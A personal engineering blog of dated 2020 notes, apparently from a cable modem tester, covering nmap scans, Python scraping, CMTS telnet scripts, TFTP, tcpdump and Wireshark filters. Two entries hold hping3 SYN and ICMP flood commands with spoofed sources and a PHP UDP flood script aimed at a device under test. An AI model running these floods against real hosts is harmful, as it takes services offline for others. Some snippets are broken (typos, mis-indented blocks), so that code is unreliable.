Thursday, December 17, 2020

scanning port (NMAP)

 

TCP:

nmap -v -sT -T2 -Pn -p T:5060,111,65431,44318,4159,80,443,53 IPv4-Address

nmap -v -sT -T2 -Pn -p T:52224,705,111,51413,37915,4159,22,23 -6 IPv6-Address

UDP:

nmap -v -sU -T2 -Pn -p U:1293,111,161,162,3000,5060,546,53  IPv4-Address

nmap -v -sU -T2 -Pn -p U:1293,111,2427,161,162,3000,546 -6  IPv6-Address


hping IP Flood attack to DUT


 1. Connect a LAN PC to DUT via ethernet. Do " ping  8.8.8.8 -t" and access websites, can success.

2. Use hping3 command " hping3 -S -P -U --flood -V --rand-source DUT-IP" ( DUT's  IP) to attack DUT WAN IP.

3. After a while, no more than 1 minutes, LAN PC can not ping successfully, and can not access internet.

4. Use hping3 command "hping3 -1 --flood -V target" generate icmp flood to attack DUT WAN IP.

5. After a while, LAN PC can not ping successfully, and can not access internet.

Monday, June 22, 2020

pyhton error Anaconda3

if you run python see this problem related to Anaconda3
Anaconda3\lib\site-packages\numpy\__init__.py:140: UserWarning: mkl-service package failed to import, therefore Intel(R) MKL initialization ensuring its correct out-of-the box operation under condition when Gnu OpenMP had already been loaded by Python process is not assured. Please install mkl-service package, see http://github.com/IntelPython/mkl-service

Solution:
go to environment setting and add this in it: C:\Users\username\Anaconda3\Library\bin

Sunday, June 7, 2020

python with database



import sqlite3
conn = sqlite3.connect('D:\\hskio_python.db')
try:
    info = []
    cur = conn.cursor()
    rows = cur.execute('select * from person')
    for row in rows:
        id = row[0]
        hei ght = row[2]
        weight = row[3]
        bmi = round(weight/height**2, 2)
        print(id, height, weight, bmi)
        info.append([bmi, id])
    for data in info:
        cur.execute('update person set bmi=%d where id=%d' % (data[0], data[1]))
    conn.commit()
    
finally:
    conn.close()


beautifulsoup example

 beautifulsoup example 

Find and Findall Parameter:


findAll(tag, attributes, recursive, text, limit, keywords) find(tag, attributes, recursive, text, keywords)

Find Parameter: 
 beautifulsoup example  Find h1 tag
import requests
from bs4 import BeautifulSoup
resp=requests.get("https://code-gym.github.io/spider_demo/")
soup=BeautifulSoup(resp.text, 'html5lib')
print(soup.find('h1'))

beautifulsoup print with tag and without

With tag 
print(soup.find('h1'))

Without tag 
print(soup.h1)

Findall parameter: 


for h3 in soup.find_all('h3'): print(h3)

Find class name
for title in soup.find_all('h3','post-title'): print(title)


beautifulsoup crawl ptt sock

去ptt 股票爬文章


import requests
from bs4 import BeautifulSoup
import time
today = time.strftime('%m/%d').lstrip('0')

def ptt(url):
    resp = requests.get(url)
    if resp.status_code != 200:
        print('URL發生錯誤:' + url)
        return
    soup = BeautifulSoup(resp.text, 'html5lib')
    paging = soup.find('div', 'btn-group btn-group-paging').find_all('a')[1]['href']

    articles = []
    rents = soup.find_all('div', 'r-ent')

    for rent in rents:
        title = rent.find('div', 'title').text.strip()
        count = rent.find('div', 'nrec').text.strip()
        date = rent.find('div', 'meta').find('div', 'date').text.strip()
        article = '%s %s:%s' % (date, count, title)

        try:
            if today == date and int(count) > 10:
                articles.append(article)
        except:
            if today == date and count == '爆':
                articles.append(article)
    if len(articles) != 0:
        for article in articles:
            print(article)
        ptt('https://www.ptt.cc' + paging)
    else:
        return

ptt('https://www.ptt.cc/bbs/Stock/index.html')

Thursday, June 4, 2020

python changed pip

if our install pyton2 and python3 on your PC, it might used python2's pip. you can used the command

pip --version
D:\selenium-3.141.0.tar\dist\selenium-3.141.0>pip --version
pip 20.1.1 from c:\python27\lib\site-packages\pip (python 2.7)

you can also do like this :
#python36\Scripts\pip.exe install packagename
Example:
C:\python37\Scripts>pip3.exe install packagename

reference:
https://stackoverflow.com/questions/39851566/using-pip-on-windows-installed-with-both-python-2-7-and-3-5
https://stackoverflow.com/questions/40832533/pip-or-pip3-to-install-packages-for-python-3

selenium problem

This is a interesting topic and funny thing about selenium, after surfing on the net, i find this article which really solve the problem.


Problem: Used pip to install selenium and show install success. But module ONLY work on Python2 BUT Python3 DON'T work. Sound really strange, isn't.  
Solution: So just download selenium package and manual install. 
How: Just extract the file and go to the directory and used the command will install:
python
Conclusion is we have to manual install selenium . 



Wednesday, June 3, 2020

Seliunm

Chrome diver: chromedriver
https://chromedriver.chromium.org/downloads

Firefox driver: geckodriver
https://github.com/mozilla/geckodriver/releases

Basic Selenium
from selenium import webdriver
browser=webdriver.Chrome('D:\\chromedriver.exe')
browser.get('http://google.com')
browser.quit() 

Selenium with beautifulsoup example 1: will pop chrome 


from selenium import webdriver
from bs4 import BeautifulSoup
try:
    chrome=webdriver.Chrome(executable_path='D:\\CHROME_DRIVER\\chromedriver.exe')
    chrome.set_page_load_timeout(10)
    chrome.get('https://code-gym.github.io/spider_demo/')
    soup = BeautifulSoup(chrome.page_source, 'html5lib')
    print(soup.find('h1').text)
finally:
browser.quit() 


Selenium with beautifulsoup example 2: will run chrome at daemon
from selenium import webdriver
from bs4 import BeautifulSoup
try:
    options = webdriver.ChromeOptions()
    options.add_argument('--headless')     
    chrome=webdriver.Chrome(options=options,executable_path='D:\\CHROME_DRIVER\\chromedriver.exe')
    chrome.set_page_load_timeout(10)
    chrome.get('https://code-gym.github.io/spider_demo/')
    soup = BeautifulSoup(chrome.page_source, 'html5lib')
    print(soup.find('h1').text)
finally:
browser.quit() 

Selenium with beautifulsoup using xpath to find related article 


from selenium import webdriver
from bs4 import BeautifulSoup
try:
.    options = webdriver.ChromeOptions()
    ..........................
    ..........................
    ..........................
  print(soup.find('h1').text)
  chrome.find_element_by_xpath('/html/body/div[2]/div/div[1]/div[1]/div/div/h3/a').click(
  print(chrome.find_element_by_xpath('//*[@id="post-header"]/div[2]/div/div/h1').text)
finally:
browser.quit() 


Tuesday, May 26, 2020

VOIP Set IPv6


In order to set IPv6 under MTA(VOIP) you need to set your DUT as below:

CM IPv4 and IPV6 policy set under option:    [17] (dhcp6-cablelabs-config) set as below
v6 ONLY:
(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxxcfg)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(ip-pref 39 2)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 20:01:00:00:01:30))))


dual  ONLY:
(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxxcfg)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(ip-pref 39 5)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 20:01:00:00:01:30))))

MTA IPv4 and IPV6 policy set as below

(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxx.bin)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 01:02:03:04:05:06:07:08:09)(provisioning-server 3 (flag 0; provisioning-server prov.ht.com.))(kerberos-realm 6 BASIC.1.))))

Thursday, May 21, 2020

CBR8 some command

Cisco CBR8 Command Note

1. see all dut online on CMTS
command: scm
note: scm is abbreviated as show cable modem
2. see only how many dut device locks
command: show cable modem docsis version d31-capable

CMTS(CBR8) Check US power

If your CM only locked 1 ofdma, but your throughput is les than 10Mbps, please go to see your UPstream power.

You can go to CMTS to see your US subcarrier

Command: show cable modem xxxx.xxxx.xxxx prof-mgmt upstream
(xxxx.xxxx.xxxxx mac address)

Wednesday, May 20, 2020

bsod


BSOD Setting

BSOD Check from CMTS to see anyone is using it
#show cable l2-vpn xconnect dot1q-vc-map

Note: If someone is using the same BSOD Vlan id with you, your DUT might not be able to get online












BSOD Configure File:










Vlan Setting









How to test.
Environment :


Monday, May 18, 2020

WIFI common concept


802.11b(2.4G)
802.11g(2.4G)
802.11a(5G) old 5G
802.11n- HT( or Legacy 2.4G)
802.11ac -VHT(5G)
802.11ax -HE(5G)

When people talk about
When people talk about 5G we will refer to 11AC and 11AX.
Some people will use
11AC as VHT
11AX as HE
11N as VHT or Non-HT(Legacy)

BandWidth:
2.4G: 20,40 MHz

5G: 40,80,160 MHz






Thursday, May 14, 2020

WIFI-Max Client(IXVeriwave)


This is to stimulate how many client wifi is able to support using Veriwave(IXIA).

1. Go to ixia-veriwave and choose max client











Sunday, April 19, 2020

python telnet to cmts to get ipv6


This is a script to telnet to CMTS-Cisco server to get ipv6 address

The different between python2 and python3 is the byte and str

PYTHON3 we need to use tn.read_until(b"Username:")
PYTHON2 we don't need byte tn.read_until("Username:")

since we need to used byte, so we have to convert to str using decode
we can use decode utf-8 or big5, depend on our OS. If you used CHINESE you have to used BIG5, else ping will not show correct.

Manual Test: 
1.Login to CMTS/Cisco Server
2. used the command to see your ipv6 addres: scm XXX.XXX.XXXX ipv6


1)Method 1 python3 just telnet and get the ipv6 of specfic mac
import getpass
import re
import telnetlib
HOST = "192.168.1.252"
#user = input("Enter your remote account: ")
#password = getpass.getpass()
user='guest'
password='guest'
tn = telnetlib.Telnet(HOST)

tn.read_until(b"Username:")
tn.write(user.encode('ascii') + b"\n")
if password:
    tn.read_until(b"Password:")
    tn.write(password.encode('ascii') + b"\n")

value = tn.read_until(b"Router#")
tn.write(b"scm mac = "AAAA.BBBB.CCCC" ipv6 \n")
value = tn.read_until(b"Router#")
#######################################################
value=value.decode('utf8')
info = "2001"
matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
#matchObj=matchObj.decode('big5')

       
if matchObj:
    Ipv6_address = info + matchObj.group(1)
    Ipv6 = Ipv6_address.replace("\n", "")
    print(Ipv6)
    #return Ipv6

else:
    print ("No match!!")  
  

####################################################
        
tn.write(b"exit\n")
#print(tn.read_all().decode('ascii'))
2)Method 2 using function and check telnet reachable or not(python3)

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    stdout=stdout.decode("big5")
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until(b"Username:")
            #tn.write(username + "\n")
            tn.write(username.encode('ascii') + b"\n")
            if password:
                tn.read_until(b"Password:")
                #tn.write(password + "\n")
                tn.write(password.encode('ascii') + b"\n")
            time.sleep(3)
            return tn
    except IOError:
        print ("Telnet " + HOST + " failed. Please check the server connection")

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until(b"Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command.encode('ascii') + b"\n")
        #tn.write(command)
        
        value = tn.read_until(b"Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"
       
        #value=str(value)
        value=value.decode('utf8')
        
        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
       
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6
        else:
           print ("No match!!")    
        
    else:
        print ("Telnet failed")
ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print (new_IPv6)

3)Method 3 same as method2 using python2
# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until("Username:")
            tn.write(username + "\n")
            if password:
                tn.read_until("Password:")
                tn.write(password + "\n")
            time.sleep(3)
            return tn
    except IOError:
        print "Telnet " + HOST + " failed. Please check the server connection"

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until("Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command)
        value = tn.read_until("Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"

        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6

        else:
           print "No match!!"    
    else:
        print "Telnet failed"


ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print new_IPv6

Saturday, April 18, 2020

Unicode and decode python

Python2 uses str, but in python3 it uses byte.




Reference 

you can use type(var) to see what type is it. 

Thursday, April 16, 2020

Bash append file to date and time format

Some people would like to export or append your file or log name after the date and time format, like this YYMMDD_MMHHSS.

i have a script it is able to append in this style
@ECHO OFF
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~6,2%
set datetime=%datetime: =0%
echo hello >>%datetime%.txt
EXIT
It will output like this "2020-17-20_104919.txt"

if you don't want the second just modify like this
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~4,0%
Resource: 
https://stackoverflow.com/questions/1192476/format-date-and-time-in-a-windows-batch-script

Wednesday, April 15, 2020

ddos and security


DDOS Related attack command

command:
1. run attac, and run bulk call should not have problem
hping2  wan0 -2 0i u2 -I eth1
hping2  mta0 -2 0i u2 -I eth1
2. while running attack =, on CPE browser WEB will cause kernel panic
hping3 -V -c 10000 -d 300 -S -p 80 -w 1500 --flood 10.15.3.4 (dummy0.3)
CPE1(lan)-------
CM-------
CMTS-----------CPE2(linux/ubuntu)
CPE1: open browser (youtube channel)
CPE2: used linux to run hping

Script to attach:
<?php 
$host = '10.200.114.18';
$pps = 5000; 
$tune = 125; 
$sock = socket_create( AF_INET, SOCK_DGRAM, SOL_UDP ); 
$uslp = (1000000 / $pps) - $tune; 
if( $uslp < 0 )
$uslp = 0; 
for( $i = 6500000; $i > 0; $i-- )
{ $port = rand( 1025, 65535 ); socket_sendto( $sock, 'LUT2', 4, 0, $host, $port ); usleep( $uslp ); }
?>

IP Passthrough

How to test IP PASS Through

TEST STEP:

With MAC address
1)      Let modem to get online
2)      Connect CPE to CM on lan side
3)      Access GUI from Lan side, and add cpe mac address from ip passthrough
4)      CPE will get the same domain as erouter0
5)      Ping to cpe from CMTS or back of cmts

CPE1----------CM--------------CMTS------------CPE2

Cpe1 will get a public ip (same domain as erouter0)
CPE2 should be able to ping to CPE1



bsod

check BSOD on CMTS
#show cable l2-vpn xconnect dot1q-vc-map
Set VLAN on your config

tcpdump and tftp command


1. Window TFTP Command
tftp -i [IP ADD] [PUT|GET][ FILE NAME]
-g:     get file
 -r:     remote
 -p:     put file
  -l:     local

tftp -i 192.168.1.55 PUT test.txt

2. TFTP Linux
Example: 
tftp [-g|-p]  -r FILENAME SERVERIP
Download: 
tftp -g -r tcpdump 192.168.1.50

Upload
example: tftp -p -r test.txt 192.168.1.50

3. TCPdump and tftp Command, doing packet capture under ROUTER 
You can do this on linux PC also 

Capture all packet:
#cd /var/tmp
#tcpdump -nni any
Capture wan0 interface 
tcpdump -i wan0 -s 0 -w wan0.pcap&
stop capture packet, kill process id
#ps |grep .pcap
#kill -s tcpdum 'pid'

upload to your pc by tftp command
tftp -l wan0.pcap -p 192.168.1.50

Macro-Script

How to used Macro Script(Terateam) to do studd like console:

Example 1 using telnet method to login cisco server or router: 
File name: telnet_cisco.ttl
timeout = 10
connect '192.168.1.252:23 /nossh /T=1'
;Wait a prompt message to login
wait 'Username:'
; Send username
sendln 'cisco'
;Wait for a keyword to enter password
wait 'Password:'
; Send password
sendln 'cisco'
File name: cisco.bat
@echo off
cd C:\Program Files (x86)\teraterm
TTERMPRO /m=D:\Macro_script\telnet_cisco.ttl
pause
How to used it:
Just run the cisco.bat, it will automatic telnet  for you.

Example 2: using serial comport to login your console 
File name: comport.ttl
pause 5
;sendin command
sendln "pacm "
pause 2
;closett will close the screen
closett

File name: comport.bat
@echo off
cd C:\Program Files (x86)\teraterm
TTERMPRO /C=3 /BAUD=115200 /c=3 /m=D:\comport.ttl
pause
How to used it:
Just run the comport.bat, it will automatic accees using terateam to open com-port3 to your DUT console. If  you have different com-port just changed the c=3 to correct com-port. My console port is 3, so I set to 3.


wireshark Filter


Find IPV4 MAC address for DHCP
bootp.hw.mac_addr ==XX:XX:XX:XX:XX:XX
Find IPV6 MAC address for DHCP
dhcpv6.duidll.link_layer_addr == “XX:XX:XX:XX:XX:XX”
Find DNS Qeuery:
dns.qry.name == “XXX.XX.com”
Filter specific IP address overnight or many days. 
If you used above method, your PC might hang. Basely above capture all the packet and just filter. But this is not the best way if you want to capture many hours.  

In order to solve this problem, you have to just capture you wanted packet, it will not capture other packet. 
capture>options>capture filter>type your target to filter(ex: host xxx.xxx.xxx.xxx && udp port=XX)